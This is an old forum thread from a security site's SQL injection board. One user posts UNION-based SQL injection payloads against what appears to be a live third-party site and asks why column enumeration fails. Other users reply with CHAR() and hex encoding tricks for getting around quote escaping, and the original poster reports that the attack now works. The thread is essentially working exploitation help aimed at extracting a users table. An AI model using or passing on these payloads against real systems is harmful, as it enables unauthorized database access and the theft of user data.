|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 74
Members: 0
Total: 74
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Pb with column name |
|
Posted: Tue Mar 11, 2008 1:08 am |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Hello !
The version installed on the server is 5.0.45-Debian_1ubuntu3.1-log
I can get table name with
Code: | &id=-1+UNION+ALL+SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+20,1--+ |
but when i want to get column name
Code: | &id=-1+UNION+ALL+SELECT+COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME='lg_users'+AND+TABLE_SCHEMA='argh'+LIMIT+0,1--+ |
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/ligue/clanprofile.php on line 14
Dunno what is the problem, if i am able to list table name, why cant i list the column name? |
|
|
|
|
|
|
|
|
Posted: Wed Mar 12, 2008 2:31 pm |
|
|
onbiew |
Regular user |
|
|
Joined: Nov 29, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
try with char ascii
&id=-1+UNION+ALL+SELECT+COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=concat(char(108),char(103),char(95),char(117),char(115),char(101),char(114),char(115))+AND+TABLE_SCHEMA=concat(char(97),char(114),char(103),char(104))+LIMIT+0,1--+ |
|
|
|
|
Posted: Wed Mar 12, 2008 2:46 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
... or use hex encoded strings "0xaabbcc...", because php "magic_quotes" feature can change "'" to "\'" |
|
|
|
|
Posted: Thu Mar 13, 2008 1:16 am |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Thx it is working now |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|